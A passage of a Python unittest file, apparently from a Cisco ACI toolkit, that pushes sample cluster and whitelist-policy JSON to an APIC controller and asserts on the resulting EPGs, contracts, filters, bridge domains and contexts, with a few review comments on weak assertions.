"src": "56c55b8761707062b2d11b00",
"dst": "56c3d31561707035c0c12b00",
"src_name": "Configpushtest-policy*-(1)",
"dst_name": "Configpushtest-policy*-(2)",
"descr": "sample description",
"whitelist": [
{
"port": [
0,
0
],
"proto": 1,
"action": "ALLOW"
},
{
"port": [
0,
0
],
"proto": 6,
"action": "ALLOW"
}
]
}
]
}
"""
    tenant_name = 'configpush-test'
    load_config = LoadConfig()
    load_config.load_configFile(config_file, is_file=False)
    # Delete any pre-existing tenant so the next push starts clean.
    tenants = Tenant.get(load_config.session)
    for tenant in tenants:
        if tenant.name == tenant_name:
            tenant.mark_as_deleted()
            resp = tenant.push_to_apic(load_config.session)
            if not resp.ok:
                print "tenant deletion failed"
    load_config = LoadConfig()
    load_config.load_configFile(config_file, is_file=False)
    # Give APIC time to process the pushed configuration.
    time.sleep(5)
    tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
    for tenant in tenants:
        if tenant.name == 'configpush-test':
            existing_filters = tenant.get_children(Filter)
            self.assertEquals(len(existing_filters), 2,
                              "filter count did not match for the pushed config and existing config")
            app_profiles = tenant.get_children(AppProfile)
            # NOTE(review): assumes at least one AppProfile / OutsideL3
            # exists -- an empty list raises IndexError instead of a clean
            # test failure.
            app = app_profiles[0]
            # No app/l3ext names were passed, so the tool defaults apply.
            self.assertEquals(
                app.name,
                'appProfile-test',
                "application profile name didnot match with the default appProfile-test")
            outsideL3s = tenant.get_children(OutsideL3)
            self.assertEquals(
                outsideL3s[0].name,
                'l3ext-test',
                "External routed network with default name doesnot exist l3ext-test")
            for outsideL3 in outsideL3s:
                if outsideL3.name == 'l3ext-test':
                    # Only the external cluster (2) becomes an OutsideEPG;
                    # it provides the contract.
                    outsideEpgs = outsideL3.get_children(OutsideEPG)
                    self.assertEquals(len(outsideEpgs), 1, "the num of outside epgs didnot match")
                    for outsideEpg in outsideEpgs:
                        self.assertEquals(outsideEpg.name, "Configpushtest_-_2_-1", "outside EPG name didnot match")
                        self.assertNotEquals(
                            outsideEpg.name,
                            "Configpushtest_-_1_-0",
                            "outside EPG name didnot match")
                        self.assertEqual(len(outsideEpg.get_all_consumed()), 0,
                                         "consumed EPG did not match for EPG " + outsideEpg.name)
                        self.assertEqual(len(outsideEpg.get_all_provided()), 1,
                                         "provided EPG did not match for EPG " + outsideEpg.name)
            # The non-external cluster (1) stays in the app profile and
            # consumes the contract.
            existing_epgs = app.get_children(EPG)
            self.assertEquals(len(existing_epgs), 1,
                              "epgs count did not match for the pushed config and existing config")
            for existing_epg in existing_epgs:
                self.assertEqual(existing_epg.is_attributed_based, False,
                                 "attribute based is true for EPG " + existing_epg.name)
                self.assertNotEquals(existing_epg.name, "Configpushtest_-_2_-1", "outside EPG name didnot match")
                if existing_epg.name == 'Configpushtest_-_1_-0':
                    self.assertEqual(len(existing_epg.get_all_consumed()), 1,
                                     "consumed EPG did not match for EPG " + existing_epg.name)
                    self.assertEqual(len(existing_epg.get_all_provided()), 0,
                                     "provided EPG did not match for EPG " + existing_epg.name)
            existing_contracts = tenant.get_children(Contract)
            self.assertEquals(len(existing_contracts), 1,
                              "contracts count did not match for the pushed config and existing config")
            for existing_contract in existing_contracts:
                for child_contractSubject in existing_contract.get_children(ContractSubject):
                    self.assertEqual(len(child_contractSubject.get_filters()), 2,
                                     "num of filters in contract subject did not match " + child_contractSubject.name)
            # The tool is not expected to create bridge domains or contexts.
            existing_bds = tenant.get_children(BridgeDomain)
            self.assertEquals(len(existing_bds), 0,
                              "bridgeDomains count did not match for the pushed config and existing config")
            existing_contexts = tenant.get_children(Context)
            self.assertEquals(len(existing_contexts), 0,
                              "existing_contexts count did not match for the pushed config and existing config")
def test_update_configpush_l3out_for_external(self):
    """
    After the initial l3out push, change ``external`` to true for the
    cluster named Configpushtest*-(1).

    After pushing this config there should be 2 l3out EPGs under the
    external routed network and no EPG left in the appProfile.
    """
    config_file = """
    {
        "clusters": [
            {
                "name": "Configpushtest*-(1)",
                "id": "56c55b8761707062b2d11b00",
                "descr": "sample description",
                "external": true,
                "route_tag": {
                    "subnet_mask": "173.38.111.0/24",
                    "name": "rtp1-dcm01n-gp-db-dr2:iv2133"
                },
                "labels": [
                ],
                "nodes": [
                    {
                        "ip": "173.38.111.127",
                        "name": "lnxdb-dr-vm-421"
                    },
                    {
                        "ip": "173.38.111.131",
                        "name": "lnxdb-dr-vm-422"
                    }
                ]
            },
            {
                "name": "Configpushtest*-(2)",
                "id": "56c3d31561707035c0c12b00",
                "descr": "sample description",
                "external": true,
                "approved": true,
                "route_tag": {
                    "subnet_mask": "0.0.0.0/0",
                    "name": "INTERNET-EXTNET"
                },
                "labels": [
                ],
                "nodes": [
                    {
                        "ip": "173.38.111.126",
                        "name": "lnxdb-dr-vm-423"
                    },
                    {
                        "ip": "173.38.111.128",
                        "name": "lnxdb-dr-vm-424"
                    }
                ]
            }
        ],
        "policies": [
            {
                "src": "56c55b8761707062b2d11b00",
                "dst": "56c3d31561707035c0c12b00",
                "src_name": "Configpushtest-policy*-(1)",
                "dst_name": "Configpushtest-policy*-(2)",
                "descr": "sample description",
                "whitelist": [
                    {
                        "port": [
                            0,
                            0
                        ],
                        "proto": 1,
                        "action": "ALLOW"
                    },
                    {
                        "port": [
                            0,
                            0
                        ],
                        "proto": 6,
                        "action": "ALLOW"
                    }
                ]
            }
        ]
    }
    """
    tenant_name = 'configpush-test'
    # Initial push, then delete any pre-existing test tenant so the
    # second push below starts from a known state.
    load_config = LoadConfig()
    load_config.load_configFile(config_file, is_file=False)
    tenants = Tenant.get(load_config.session)
    for tenant in tenants:
        if tenant.name == tenant_name:
            tenant.mark_as_deleted()
            resp = tenant.push_to_apic(load_config.session)
            if not resp.ok:
                print("tenant deletion failed")
    load_config = LoadConfig()
    load_config.load_configFile(config_file, is_file=False)
    # give the APIC a moment to apply the pushed config
    time.sleep(5)
    tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
    for tenant in tenants:
        if tenant.name == 'configpush-test':
            existing_filters = tenant.get_children(Filter)
            self.assertEqual(len(existing_filters), 2,
                             "filter count did not match for the pushed config and existing config")
            app_profiles = tenant.get_children(AppProfile)
            app = app_profiles[0]
            self.assertEqual(
                app.name,
                'appProfile-test',
                "application profile name didnot match with the default appProfile-test")
            outsideL3s = tenant.get_children(OutsideL3)
            self.assertEqual(
                outsideL3s[0].name,
                'l3ext-test',
                "External routed network with default name doesnot exist l3ext-test")
            for outsideL3 in outsideL3s:
                if outsideL3.name == 'l3ext-test':
                    outsideEpgs = outsideL3.get_children(OutsideEPG)
                    # both clusters are external now, so both live as l3out EPGs
                    self.assertEqual(len(outsideEpgs), 2, "the num of outside epgs didnot match")
                    for existing_epg in outsideEpgs:
                        if existing_epg.name == 'Configpushtest_-_1_-0':
                            self.assertEqual(len(existing_epg.get_all_consumed()), 1,
                                             "consumed EPG did not match for EPG " + existing_epg.name)
                            self.assertEqual(len(existing_epg.get_all_provided()), 0,
                                             "provided EPG did not match for EPG " + existing_epg.name)
                        elif existing_epg.name == 'Configpushtest_-_2_-1':
                            self.assertEqual(len(existing_epg.get_all_consumed()), 0,
                                             "consumed EPG did not match for EPG " + existing_epg.name)
                            self.assertEqual(len(existing_epg.get_all_provided()), 1,
                                             "provided EPG did not match for EPG " + existing_epg.name)
            # every cluster is external, so the appProfile holds no EPGs
            existing_epgs = app.get_children(EPG)
            self.assertEqual(len(existing_epgs), 0,
                             "epgs count did not match for the pushed config and existing config")
            existing_contracts = tenant.get_children(Contract)
            self.assertEqual(len(existing_contracts), 1,
                             "contracts count did not match for the pushed config and existing config")
            for existing_contract in existing_contracts:
                for child_contractSubject in existing_contract.get_children(ContractSubject):
                    self.assertEqual(len(child_contractSubject.get_filters()), 2,
                                     "num of filters in contract subject did not match " + child_contractSubject.name)
            existing_bds = tenant.get_children(BridgeDomain)
            self.assertEqual(len(existing_bds), 0,
                             "bridgeDomains count did not match for the pushed config and existing config")
            existing_contexts = tenant.get_children(Context)
            self.assertEqual(len(existing_contexts), 0,
                             "existing_contexts count did not match for the pushed config and existing config")
def test_update_configpush_l3out_for_external_delete(self):
    """
    Change ``external`` back to false for the cluster named
    Configpushtest*-(1) and push again.

    The assertions below still expect 2 l3out EPGs under the external
    routed network and 0 EPGs in the appProfile.
    NOTE(review): the original docstring claimed "a single epg in
    appProfile", which contradicts the len(existing_epgs) == 0 assertion
    below — confirm which is intended.
    """
    config_file = """
    {
        "clusters": [
            {
                "name": "Configpushtest*-(1)",
                "id": "56c55b8761707062b2d11b00",
                "descr": "sample description",
                "route_tag": {
                    "subnet_mask": "173.38.111.0/24",
                    "name": "rtp1-dcm01n-gp-db-dr2:iv2133"
                },
                "labels": [
                ],
                "nodes": [
                    {
                        "ip": "173.38.111.127",
                        "name": "lnxdb-dr-vm-421"
                    },
                    {
                        "ip": "173.38.111.131",
                        "name": "lnxdb-dr-vm-422"
                    }
                ]
            },
            {
                "name": "Configpushtest*-(2)",
                "id": "56c3d31561707035c0c12b00",
                "descr": "sample description",
                "external": true,
                "approved": true,
                "route_tag": {
                    "subnet_mask": "0.0.0.0/0",
                    "name": "INTERNET-EXTNET"
                },
                "labels": [
                ],
                "nodes": [
                    {
                        "ip": "173.38.111.126",
                        "name": "lnxdb-dr-vm-423"
                    },
                    {
                        "ip": "173.38.111.128",
                        "name": "lnxdb-dr-vm-424"
                    }
                ]
            }
        ],
        "policies": [
            {
                "src": "56c55b8761707062b2d11b00",
                "dst": "56c3d31561707035c0c12b00",
                "src_name": "Configpushtest-policy*-(1)",
                "dst_name": "Configpushtest-policy*-(2)",
                "descr": "sample description",
                "whitelist": [
                    {
                        "port": [
                            0,
                            0
                        ],
                        "proto": 1,
                        "action": "ALLOW"
                    },
                    {
                        "port": [
                            0,
                            0
                        ],
                        "proto": 6,
                        "action": "ALLOW"
                    }
                ]
            }
        ]
    }
    """
    load_config = LoadConfig()
    load_config.load_configFile(config_file, is_file=False)
    # give the APIC a moment to apply the pushed config
    time.sleep(5)
    tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
    for tenant in tenants:
        if tenant.name == 'configpush-test':
            existing_filters = tenant.get_children(Filter)
            self.assertEqual(len(existing_filters), 2,
                             "filter count did not match for the pushed config and existing config")
            app_profiles = tenant.get_children(AppProfile)
            app = app_profiles[0]
            self.assertEqual(
                app.name,
                'appProfile-test',
                "application profile name didnot match with the default appProfile-test")
            outsideL3s = tenant.get_children(OutsideL3)
            self.assertEqual(
                outsideL3s[0].name,
                'l3ext-test',
                "External routed network with default name doesnot exist l3ext-test")
            for outsideL3 in outsideL3s:
                if outsideL3.name == 'l3ext-test':
                    outsideEpgs = outsideL3.get_children(OutsideEPG)
                    self.assertEqual(len(outsideEpgs), 2, "the num of outside epgs didnot match")
                    for existing_epg in outsideEpgs:
                        if existing_epg.name == 'Configpushtest_-_1_-0':
                            self.assertEqual(len(existing_epg.get_all_consumed()), 1,
                                             "consumed EPG did not match for EPG " + existing_epg.name)
                            self.assertEqual(len(existing_epg.get_all_provided()), 0,
                                             "provided EPG did not match for EPG " + existing_epg.name)
                        elif existing_epg.name == 'Configpushtest_-_2_-1':
                            self.assertEqual(len(existing_epg.get_all_consumed()), 0,
                                             "consumed EPG did not match for EPG " + existing_epg.name)
                            self.assertEqual(len(existing_epg.get_all_provided()), 1,
                                             "provided EPG did not match for EPG " + existing_epg.name)
            existing_epgs = app.get_children(EPG)
            self.assertEqual(len(existing_epgs), 0,
                             "epgs count did not match for the pushed config and existing config")
            existing_contracts = tenant.get_children(Contract)
            self.assertEqual(len(existing_contracts), 1,
                             "contracts count did not match for the pushed config and existing config")
            for existing_contract in existing_contracts:
                for child_contractSubject in existing_contract.get_children(ContractSubject):
                    self.assertEqual(len(child_contractSubject.get_filters()), 2,
                                     "num of filters in contract subject did not match " + child_contractSubject.name)
            existing_bds = tenant.get_children(BridgeDomain)
            self.assertEqual(len(existing_bds), 0,
                             "bridgeDomains count did not match for the pushed config and existing config")
            existing_contexts = tenant.get_children(Context)
            self.assertEqual(len(existing_contexts), 0,
                             "existing_contexts count did not match for the pushed config and existing config")
def test_update_configpush_l3out_for_external_policy(self):
    """
    Reverse the source and destination of the policy (and change one
    protocol from 6 to 7), so the contract and its filters should be
    updated accordingly: the consumed/provided roles of the two l3out
    EPGs swap and a 7.0.0_Filter replaces the 6.0.0_Filter.
    """
    config_file = """
    {
        "clusters": [
            {
                "name": "Configpushtest*-(1)",
                "id": "56c55b8761707062b2d11b00",
                "descr": "sample description",
                "external": true,
                "route_tag": {
                    "subnet_mask": "173.38.111.0/24",
                    "name": "rtp1-dcm01n-gp-db-dr2:iv2133"
                },
                "labels": [
                ],
                "nodes": [
                    {
                        "ip": "173.38.111.127",
                        "name": "lnxdb-dr-vm-421"
                    },
                    {
                        "ip": "173.38.111.131",
                        "name": "lnxdb-dr-vm-422"
                    }
                ]
            },
            {
                "name": "Configpushtest*-(2)",
                "id": "56c3d31561707035c0c12b00",
                "descr": "sample description",
                "external": true,
                "approved": true,
                "route_tag": {
                    "subnet_mask": "0.0.0.0/0",
                    "name": "INTERNET-EXTNET"
                },
                "labels": [
                ],
                "nodes": [
                    {
                        "ip": "173.38.111.126",
                        "name": "lnxdb-dr-vm-423"
                    },
                    {
                        "ip": "173.38.111.128",
                        "name": "lnxdb-dr-vm-424"
                    }
                ]
            }
        ],
        "policies": [
            {
                "src": "56c3d31561707035c0c12b00",
                "dst": "56c55b8761707062b2d11b00",
                "src_name": "Configpushtest-policy*-(2)",
                "dst_name": "Configpushtest-policy*-(1)",
                "descr": "sample description",
                "whitelist": [
                    {
                        "port": [
                            0,
                            0
                        ],
                        "proto": 1,
                        "action": "ALLOW"
                    },
                    {
                        "port": [
                            0,
                            0
                        ],
                        "proto": 7,
                        "action": "ALLOW"
                    }
                ]
            }
        ]
    }
    """
    load_config = LoadConfig()
    load_config.load_configFile(config_file, is_file=False)
    # give the APIC a moment to apply the pushed config
    time.sleep(5)
    tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
    for tenant in tenants:
        if tenant.name == 'configpush-test':
            existing_filters = tenant.get_children(Filter)
            self.assertEqual(len(existing_filters), 2,
                             "filter count did not match for the pushed config and existing config")
            for existing_filter in existing_filters:
                # proto 6 was replaced by proto 7 in the whitelist
                self.assertTrue(existing_filter.name in ['1.0.0_Filter', '7.0.0_Filter'])
                self.assertTrue(existing_filter.name != '6.0.0_Filter')
            app_profiles = tenant.get_children(AppProfile)
            app = app_profiles[0]
            self.assertEqual(
                app.name,
                'appProfile-test',
                "application profile name didnot match with the default appProfile-test")
            outsideL3s = tenant.get_children(OutsideL3)
            self.assertEqual(
                outsideL3s[0].name,
                'l3ext-test',
                "External routed network with default name doesnot exist l3ext-test")
            for outsideL3 in outsideL3s:
                if outsideL3.name == 'l3ext-test':
                    outsideEpgs = outsideL3.get_children(OutsideEPG)
                    self.assertEqual(len(outsideEpgs), 2, "the num of outside epgs didnot match")
                    for existing_epg in outsideEpgs:
                        # roles are swapped compared to the original policy direction
                        if existing_epg.name == 'Configpushtest_-_1_-0':
                            self.assertEqual(len(existing_epg.get_all_consumed()), 0,
                                             "consumed EPG did not match for EPG " + existing_epg.name)
                            self.assertEqual(len(existing_epg.get_all_provided()), 1,
                                             "provided EPG did not match for EPG " + existing_epg.name)
                        elif existing_epg.name == 'Configpushtest_-_2_-1':
                            self.assertEqual(len(existing_epg.get_all_consumed()), 1,
                                             "consumed EPG did not match for EPG " + existing_epg.name)
                            self.assertEqual(len(existing_epg.get_all_provided()), 0,
                                             "provided EPG did not match for EPG " + existing_epg.name)
            existing_epgs = app.get_children(EPG)
            self.assertEqual(len(existing_epgs), 0,
                             "epgs count did not match for the pushed config and existing config")
            # NOTE(review): existing_epgs was just asserted to be empty, so the
            # loop below never executes; kept for parity with the other tests.
            for existing_epg in existing_epgs:
                self.assertEqual(existing_epg.is_attributed_based, False,
                                 "attribute based is true for EPG " + existing_epg.name)
                self.assertNotEqual(existing_epg.name, "Configpushtest_-_2_-1", "outside EPG name didnot match")
                if existing_epg.name == 'Configpushtest_-_1_-0':
                    self.assertEqual(len(existing_epg.get_all_consumed()), 1,
                                     "consumed EPG did not match for EPG " + existing_epg.name)
                    self.assertEqual(len(existing_epg.get_all_provided()), 0,
                                     "provided EPG did not match for EPG " + existing_epg.name)
            existing_contracts = tenant.get_children(Contract)
            self.assertEqual(len(existing_contracts), 1,
                             "contracts count did not match for the pushed config and existing config")
            for existing_contract in existing_contracts:
                for child_contractSubject in existing_contract.get_children(ContractSubject):
                    self.assertEqual(len(child_contractSubject.get_filters()), 2,
                                     "num of filters in contract subject did not match " + child_contractSubject.name)
            existing_bds = tenant.get_children(BridgeDomain)
            self.assertEqual(len(existing_bds), 0,
                             "bridgeDomains count did not match for the pushed config and existing config")
            existing_contexts = tenant.get_children(Context)
            self.assertEqual(len(existing_contexts), 0,
                             "existing_contexts count did not match for the pushed config and existing config")
def test_useipEpg_configpush_for_policy(self):
    """
    Initial push with useipEpgs enabled.

    When ipEpgs are used, uSeg EPGs are created instead of Application
    EPGs, and a base EPG plus bridge domain / context are created.
    """
    config_file = """
    {
        "clusters": [
            {
                "name": "Configpushtest*-(4)",
                "id": "56c55b8761707062b2d14b00",
                "descr": "sample description",
                "route_tag": {
                    "subnet_mask": "173.38.111.0/24",
                    "name": "rtp1-dcm01n-gp-db-dr2:iv2133"
                },
                "labels": [
                ],
                "nodes": [
                    {
                        "ip": "173.38.111.128",
                        "name": "lnxdb-dr-vm-421"
                    },
                    {
                        "ip": "173.38.111.131",
                        "name": "lnxdb-dr-vm-422"
                    }
                ]
            },
            {
                "name": "Configpushtest*-(5)",
                "id": "56c3d31561707035c0c15b00",
                "descr": "sample description",
                "approved": true,
                "route_tag": {
                    "subnet_mask": "0.0.0.0/0",
                    "name": "INTERNET-EXTNET"
                },
                "labels": [
                ],
                "nodes": [
                    {
                        "ip": "173.38.111.127",
                        "name": "lnxdb-dr-vm-423"
                    },
                    {
                        "ip": "173.38.111.129",
                        "name": "lnxdb-dr-vm-424"
                    }
                ]
            }
        ],
        "policies": [
            {
                "src": "56c55b8761707062b2d14b00",
                "dst": "56c3d31561707035c0c15b00",
                "src_name": "Configpushtest-policy*-(6)",
                "dst_name": "Configpushtest-policy*-(7)",
                "descr": "sample description",
                "whitelist": [
                    {
                        "port": [
                            0,
                            0
                        ],
                        "proto": 1,
                        "action": "ALLOW"
                    },
                    {
                        "port": [
                            1,
                            1
                        ],
                        "proto": 17,
                        "action": "ALLOW"
                    }
                ]
            }
        ]
    }
    """
    tenant_name = 'configpush-test'
    # Initial push, then delete any pre-existing test tenant so the
    # useipEpgs push below starts from a known state.
    load_config = LoadConfig()
    load_config.load_configFile(config_file, is_file=False)
    tenants = Tenant.get(load_config.session)
    for tenant in tenants:
        if tenant.name == tenant_name:
            tenant.mark_as_deleted()
            resp = tenant.push_to_apic(load_config.session)
            if not resp.ok:
                print("tenant deletion failed")
    load_config = LoadConfig()
    load_config.load_configFile(config_file, is_file=False, useipEpgs=True)
    # give the APIC a moment to apply the pushed config
    time.sleep(5)
    tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
    for tenant in tenants:
        if tenant.name == 'configpush-test':
            existing_filters = tenant.get_children(Filter)
            self.assertEqual(len(existing_filters), 2,
                             "filter count did not match for the pushed config and existing config")
            app_profiles = tenant.get_children(AppProfile)
            app = app_profiles[0]
            # 2 cluster EPGs plus the 'base' EPG
            existing_epgs = app.get_children(EPG)
            self.assertEqual(len(existing_epgs), 3,
                             "epgs count did not match for the pushed config and existing config")
            for existing_epg in existing_epgs:
                if existing_epg.name != 'base':
                    self.assertTrue(existing_epg.is_attributed_based,
                                    "uSeg EPG is not created for " + existing_epg.name)
            existing_contracts = tenant.get_children(Contract)
            self.assertEqual(len(existing_contracts), 1,
                             "contracts count did not match for the pushed config and existing config")
            for existing_contract in existing_contracts:
                for child_contract_subject in existing_contract.get_children(ContractSubject):
                    self.assertEqual(len(child_contract_subject.get_filters()), 2,
                                     "num of filters in contract_subject did not match " + child_contract_subject.name)
            existing_bds = tenant.get_children(BridgeDomain)
            self.assertEqual(len(existing_bds), 1,
                             "bridgeDomains count did not match for the pushed config and existing config")
            existing_contexts = tenant.get_children(Context)
            self.assertEqual(len(existing_contexts), 1,
                             "existing_contexts count did not match for the pushed config and existing config")
def test_useipEpg_node_update_configpush_for_policy(self):
    """
    After the initial useipEpgs push, push again with one node removed
    from each cluster.

    uSeg EPGs are created instead of Application EPGs, the 2 uSeg
    attributes from the previous run should still exist in both EPGs,
    and the contract should point at the latest EPGs.
    """
    config_file = """
    {
        "clusters": [
            {
                "name": "Configpushtest*-(4)",
                "id": "56c55b8761707062b2d14b00",
                "descr": "sample description",
                "route_tag": {
                    "subnet_mask": "173.38.111.0/24",
                    "name": "rtp1-dcm01n-gp-db-dr2:iv2133"
                },
                "labels": [
                ],
                "nodes": [
                    {
                        "ip": "173.38.111.128",
                        "name": "lnxdb-dr-vm-421"
                    }
                ]
            },
            {
                "name": "Configpushtest*-(5)",
                "id": "56c3d31561707035c0c15b00",
                "descr": "sample description",
                "approved": true,
                "route_tag": {
                    "subnet_mask": "0.0.0.0/0",
                    "name": "INTERNET-EXTNET"
                },
                "labels": [
                ],
                "nodes": [
                    {
                        "ip": "173.38.111.127",
                        "name": "lnxdb-dr-vm-423"
                    }
                ]
            }
        ],
        "policies": [
            {
                "src": "56c55b8761707062b2d14b00",
                "dst": "56c3d31561707035c0c15b00",
                "src_name": "Configpushtest-policy*-(6)",
                "dst_name": "Configpushtest-policy*-(7)",
                "descr": "sample description",
                "whitelist": [
                    {
                        "port": [
                            0,
                            0
                        ],
                        "proto": 1,
                        "action": "ALLOW"
                    },
                    {
                        "port": [
                            1,
                            1
                        ],
                        "proto": 17,
                        "action": "ALLOW"
                    }
                ]
            }
        ]
    }
    """
    load_config = LoadConfig()
    load_config.load_configFile(config_file, is_file=False, useipEpgs=True)
    # give the APIC a moment to apply the pushed config
    time.sleep(5)
    tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
    for tenant in tenants:
        if tenant.name == 'configpush-test':
            existing_filters = tenant.get_children(Filter)
            self.assertEqual(len(existing_filters), 2,
                             "filter count did not match for the pushed config and existing config")
            app_profiles = tenant.get_children(AppProfile)
            app = app_profiles[0]
            existing_epgs = app.get_children(EPG)
            self.assertEqual(len(existing_epgs), 3,
                             "epgs count did not match for the pushed config and existing config")
            for existing_epg in existing_epgs:
                if existing_epg.name != 'base':
                    self.assertTrue(existing_epg.is_attributed_based,
                                    "uSeg EPG is not created for " + existing_epg.name)
                    # the ip attributes from the previous run must survive
                    existing_attributeCriterions = existing_epg.get_children(AttributeCriterion)
                    for existing_attributeCriterion in existing_attributeCriterions:
                        self.assertEqual(len(existing_attributeCriterion.get_ip_addresses()), 2,
                                         "uSeg Attributes did not match")
            existing_contracts = tenant.get_children(Contract)
            self.assertEqual(len(existing_contracts), 1,
                             "contracts count did not match for the pushed config and existing config")
            for existing_contract in existing_contracts:
                for child_contract_subject in existing_contract.get_children(ContractSubject):
                    self.assertEqual(len(child_contract_subject.get_filters()), 2,
                                     "num of filters in contract_subject did not match " + child_contract_subject.name)
            existing_bds = tenant.get_children(BridgeDomain)
            self.assertEqual(len(existing_bds), 1,
                             "bridgeDomains count did not match for the pushed config and existing config")
            existing_contexts = tenant.get_children(Context)
            self.assertEqual(len(existing_contexts), 1,
                             "existing_contexts count did not match for the pushed config and existing config")
def test_useipepgs_update_for_bridgeDomain(self):
    """
    Push without useipEpgs and check the bridgeDomain.

    The bridgeDomain (and context) should not be deleted once created,
    so both counts stay at 1 after this push.
    """
    config_file = """
    {
        "clusters": [
            {
                "name": "Configpushtest*-(1)",
                "id": "56c55b8761707062b2d11b00",
                "descr": "sample description",
                "route_tag": {
                    "subnet_mask": "173.38.111.0/24",
                    "name": "rtp1-dcm01n-gp-db-dr2:iv2133"
                },
                "labels": [
                ],
                "nodes": [
                    {
                        "ip": "173.38.111.127",
                        "name": "lnxdb-dr-vm-421"
                    },
                    {
                        "ip": "173.38.111.131",
                        "name": "lnxdb-dr-vm-422"
                    }
                ]
            },
            {
                "name": "Configpushtest*-(2)",
                "id": "56c3d31561707035c0c12b00",
                "descr": "sample description",
                "approved": true,
                "route_tag": {
                    "subnet_mask": "0.0.0.0/0",
                    "name": "INTERNET-EXTNET"
                },
                "labels": [
                ],
                "nodes": [
                    {
                        "ip": "173.38.111.126",
                        "name": "lnxdb-dr-vm-423"
                    },
                    {
                        "ip": "173.38.111.128",
                        "name": "lnxdb-dr-vm-424"
                    }
                ]
            }
        ],
        "policies": [
            {
                "src": "56c55b8761707062b2d11b00",
                "dst": "56c3d31561707035c0c12b00",
                "src_name": "Configpushtest-policy*-(1)",
                "dst_name": "Configpushtest-policy*-(2)",
                "descr": "sample description",
                "whitelist": [
                    {
                        "port": [
                            0,
                            0
                        ],
                        "proto": 1,
                        "action": "ALLOW"
                    },
                    {
                        "port": [
                            0,
                            0
                        ],
                        "proto": 6,
                        "action": "ALLOW"
                    }
                ]
            }
        ]
    }
    """
    load_config = LoadConfig()
    load_config.load_configFile(config_file, is_file=False)
    # give the APIC a moment to apply the pushed config
    time.sleep(5)
    tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
    for tenant in tenants:
        if tenant.name == 'configpush-test':
            existing_filters = tenant.get_children(Filter)
            self.assertEqual(len(existing_filters), 2,
                             "filter count did not match for the pushed config and existing config")
            app_profiles = tenant.get_children(AppProfile)
            app = app_profiles[0]
            self.assertEqual(
                app.name,
                'appProfile-test',
                "application profile name didnot match with the default appProfile-test")
            outsideL3s = tenant.get_children(OutsideL3)
            self.assertEqual(
                outsideL3s[0].name,
                'l3ext-test',
                "External routed network with default name doesnot exist l3ext-test")
            for outsideL3 in outsideL3s:
                if outsideL3.name == 'l3ext-test':
                    outsideEpgs = outsideL3.get_children(OutsideEPG)
                    # no cluster is external, so no l3out EPGs remain
                    self.assertEqual(len(outsideEpgs), 0, "the num of outside epgs didnot match")
            existing_epgs = app.get_children(EPG)
            self.assertEqual(len(existing_epgs), 3,
                             "epgs count did not match for the pushed config and existing config")
            existing_contracts = tenant.get_children(Contract)
            self.assertEqual(len(existing_contracts), 1,
                             "contracts count did not match for the pushed config and existing config")
            for existing_contract in existing_contracts:
                for child_contractSubject in existing_contract.get_children(ContractSubject):
                    self.assertEqual(len(child_contractSubject.get_filters()), 2,
                                     "num of filters in contract subject did not match " + child_contractSubject.name)
            # the bridgeDomain/context created by the earlier useipEpgs
            # push must survive a push without useipEpgs
            existing_bds = tenant.get_children(BridgeDomain)
            self.assertEqual(len(existing_bds), 1,
                             "bridgeDomains count did not match for the pushed config and existing config")
            existing_contexts = tenant.get_children(Context)
            self.assertEqual(len(existing_contexts), 1,
                             "existing_contexts count did not match for the pushed config and existing config")
class TestCheckForAllTheJsonConfigs(unittest.TestCase):
    """
    Test cases that push a contract config from a specific json file.
    After it is pushed successfully using Apicservice,
    tenant.get_deep() is compared with the expected (golden) json.
    """

    def _push_and_compare(self, config_file, tenant_name, golden_file, useipEpgs=False):
        """
        Delete *tenant_name*, push *config_file* through apicservice and
        assert that the resulting tenant config matches *golden_file*.

        :param config_file: gzipped json config to push
        :param tenant_name: tenant the config is pushed into
        :param golden_file: gzipped golden (expected) tenant json
        :param useipEpgs: when True, push with uSeg (ip) EPGs enabled
        """
        load_config = LoadConfig()
        load_config.delete_tenant(tenant_name)
        if useipEpgs:
            load_config.load_configFile(config_file, tenant_name=tenant_name, useipEpgs=True)
        else:
            load_config.load_configFile(config_file, tenant_name=tenant_name)
        # give the APIC a moment to apply the pushed config
        time.sleep(5)
        tenants = Tenant.get_deep(load_config.session, names=[load_config.tool.tenant_name])
        for tenant in tenants:
            if tenant.name == tenant_name:
                # round-trip through json.dumps to normalize both sides to
                # plain python structures before diffing
                tenant_existing = ast.literal_eval(json.dumps(tenant.get_json()))
                with gzip.open(golden_file, 'rb') as data_file:
                    tenant_expected = ast.literal_eval(data_file.read())
                self.assertEqual(DeepDiff(tenant_existing, tenant_expected, ignore_order=True), {})

    def test_configpush_test1_policies(self):
        """configpush_test1_policies.json compared against its golden json."""
        self._push_and_compare('configpush_test1_policies.json.gz',
                               'configpush_test1_policies',
                               'configpush_test1_policies_tenant_golden.json.gz')

    def test_configpush_test1_policies_with_useipEpgs(self):
        """configpush_test1_policies.json pushed with useipEpgs, compared against its golden json."""
        self._push_and_compare('configpush_test1_policies.json.gz',
                               'configpush_test1_policies',
                               'configpush_test1_policies_with_useipEpgs_tenant_golden.json.gz',
                               useipEpgs=True)

    def test_configpush_test2_policies(self):
        """configpush_test2_policies.json compared against its golden json."""
        self._push_and_compare('configpush_test2_policies.json.gz',
                               'configpush_test2_policies',
                               'configpush_test2_policies_tenant_golden.json.gz')

    def test_configpush_test2_policies_with_useipEpgs(self):
        """configpush_test2_policies.json pushed with useipEpgs, compared against its golden json."""
        self._push_and_compare('configpush_test2_policies.json.gz',
                               'configpush_test2_policies',
                               'configpush_test2_policies_with_useipEpgs_tenant_golden.json.gz',
                               useipEpgs=True)

    def test_configpush_test3_policies(self):
        """configpush_test3_policies.json compared against its golden json."""
        self._push_and_compare('configpush_test3_policies.json.gz',
                               'configpush_test3_policies',
                               'configpush_test3_policies_tenant_golden.json.gz')

    def test_configpush_test3_policies_with_useipEpgs(self):
        """configpush_test3_policies.json pushed with useipEpgs, compared against its golden json."""
        self._push_and_compare('configpush_test3_policies.json.gz',
                               'configpush_test3_policies',
                               'configpush_test3_policies_with_useipEpgs_tenant_golden.json.gz',
                               useipEpgs=True)

    def test_configpush_test4_policies(self):
